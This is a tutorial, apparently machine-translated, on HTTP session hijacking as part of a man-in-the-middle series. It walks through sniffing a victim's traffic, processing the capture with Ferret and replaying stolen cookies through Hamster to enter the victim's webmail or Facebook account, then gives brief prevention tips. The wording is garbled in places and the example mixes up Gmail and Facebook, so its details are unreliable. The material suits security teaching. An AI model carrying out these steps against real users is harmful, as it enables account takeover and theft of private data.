Learn about attacking Man in the Middle - Taking over Session control

In this section, I will show you how to attack Session hijacking, along with some theories and how to perform attacks, as well as how to detect and prevent them.

1. Learn about attacking Man in the Middle - Taking over Session control Picture 1 Learn about Man-in-the-Middle attacks - ARP Cache spoofing
2. Learn about attacking Man in the Middle - Taking over Session control Picture 2 Learn about Man-in-the-Middle attacks - DNS spoofing

In the first two parts of this series of man-in-the-middle attacks, we introduced you to ARP cache spoofing, DNS spoofing. As we discussed in these examples, MITM attacks are very effective and very difficult to detect. However, in part three of this article series, I will show you a new attack, which is session hijacking. As in the previous two sections, we will introduce some theories and ways of performing attacks as well as ways to detect and prevent them.

Occupy Session control

The session hijacking term contains a series of different attacks. In general, attacks related to session exploitation between devices are considered session hijacking. When referring to a session, we will talk about the connection between devices in which the conversation state is set when the official connection is created, the connection is maintained and a process must be used. somehow to interrupt it. When talking about sessions, the theory is a bit confusing, so let's consider a session in a more realistic sense.

In this article, I will talk about session hijacking related to HTTP sessions. If you look at some of the websites that you visit require login information, they are great examples of session-oriented connections. You must be verified by the website using the username and password to set up the session, then the website will maintain some form of session checking to ensure you are still logged in and allowed to access resources (usually done by a cookie), when the session ends, the username and password certificates are removed and that is when the session expires. This is a specific example of a session that although we do not always recognize it, sessions will appear continuously and most communication is based on some form of session or action based on status.

Learn about attacking Man in the Middle - Taking over Session control Picture 3
Figure 1: A normal Session

As we have seen in previous attacks, there is nothing when going through the network is safe, and session data is no different. The hidden principle behind most forms of session hijacking is that if you can block certain parts used to set up a session, then you can use that data to play one of the components. relate to communications and from there can access session information. Our example above means that if we capture cookies that are used to maintain the session state between your browser and the website you are logging in to, we can submit that cookie to the web server and Play your connection. From an attacker's point of view, this is interesting.

Learn about attacking Man in the Middle - Taking over Session control Picture 4
Figure 2: Take control

Now that we have a bit of theory, let's go into a practical example.

Steal Cookies with Hamster and Ferret

In our practical scenario, we will perform a session hijacking attack by blocking the communication of a user who is logged into his Gmail account. Using this blocked communication, we will impersonate that user and access the account from our attacking computer.

To accomplish this attack, we will use two tools called Hamster and Ferret. You can download both of these tools here (http://hamster.erratasec.com/).

In addition, you can download and use Backtrack 4. BT4 is a live-CD distribution of Linux, designed specifically for hacking and testing the penetration process by pre-compiled and pre-installed tools, Hamster / Ferret is two of them. You can download BT4 here (http://www.backtrack-linux.org/). Then find Hamster in the directory / pentest / sniffers / hamster. The example images used in the lower part of this tutorial are taken from BT4.

The first step involved in this session hijacking is capturing the traffic of a victim user when he browses Facebook. This traffic can be captured by any 'sniffing' application, such as TCPDump or Wireshark, but to capture the correct packets, you will need to use techniques such as cache ARP spoofing ( was introduced in the first part of this series.

Learn about attacking Man in the Middle - Taking over Session control Picture 5
Figure 3: Capture user traffic browsing Gmail

Once you have captured the victim's traffic while the user is browsing to Gmail, you need to save the captured file to the Hamster folder. For example purposes, we named the file victim_gmail.pcap. When the file is in place, we will use Ferret to process the file. This is done by browsing to the Hamster folder and running the command, ferret –r victim_gmail.pcap . Ferret will process the file and create a hamster.txt file that can be used by Hamster to hijack a session.

Learn about attacking Man in the Middle - Taking over Session control Picture 6
Figure 4: Handling the capture file with Ferret

With HTTP data blocked and prepared to use, we can use Hamster to execute the attack. Hamster itself will work as a proxy to provide an interface for browsing and using stolen session cookies. To start Hamster proxy, you can execute Hamster without the command line options.

Learn about attacking Man in the Middle - Taking over Session control Picture 7
Figure 5: Launching Hamster

When executing, you need to open your browser and configure its proxy settings to match the settings provided by the Hamster output. By default, this means you will configure your proxy settings to use the internal loopback address 127.0.0.1 on port 1234. You can access these settings in Internet Explorer by selecting Tools, Internet. Options, Connections, LAN Settings , and tick the ' Use a proxy server for your LAN ' checkbox.

Learn about attacking Man in the Middle - Taking over Session control Picture 8
Figure 6: Configure proxy settings for use with Hamster

Now the proxy settings will be used and you can access the Hamster console in your browser by browsing to http:/// hamster. Hamster will use the file created by Ferret to create a list of IP addresses for people whose session information is blocked and display those IP addresses in the right pane of the browser. The file we create contains only one victim's IP address, so if you click on the left pane, we will populate the sessions for hijacking.

Learn about attacking Man in the Middle - Taking over Session control Picture 9
Figure 7: Hamster GUI

We will see facebook.com listed here, if you click on that link, you will see a new window logged into the victim Facebook account!

Learn about attacking Man in the Middle - Taking over Session control Picture 10
Figure 8: Successfully take control of a Gmail account

How to prevent attack hijacking Session

Because there are different forms of session hijacking, prevention methods also need to change with them. Like other MITM attacks that we have evaluated, session hijacking is difficult to detect and even more difficult to prevent because it is mostly a passive attack. Unless the malicious user does some obvious action when he accesses the session being hijacked, you may never know the attack is happening. Here are some things you can do to prevent this attack:

1. Online banking at home - The opportunity for someone to block your traffic on the home network is much less than the network at work. This is not because your home computer is usually safer, but the problem is that you only have one or two computers at home, most of them only worry about session hijacking if your child is more 14 years old and started watching hacking videos on YouTube and from there learning and following. On the corporate network, you don't know what's going on under the lobby or in the branch office 200 miles away, so there's a lot of potential attack resources. Be aware that one of the biggest goals of session hijacking is online banking, but it also applies to everything.
2. Need an understanding of attacks - Sophisticated attackers, including the most seasoned hackers can still make mistakes and leave traces that have attacked you. Knowing when you are logged into session-based services can help you determine if someone is stalking you. So it is your task to keep things clear, take care of the latest login time to make sure everything is going well.
3. Good security for internal computers - These attacks are usually executed from within the network. So if your network devices are safe, the chances of an attacker compromise the hosts inside your network will be less, and thus reduce the risk of session hijacking.

Conclude

So far we've introduced three very dangerous MITM attacks that can have serious consequences if they are successfully implemented. You need to know that, using session hijacking, an attacker with bad intentions can access the online bank account, user email, or even sensitive applications. feel in the internal network. In the next part of this article series, I will show you another dangerous, spoofing, MIT MITM attack.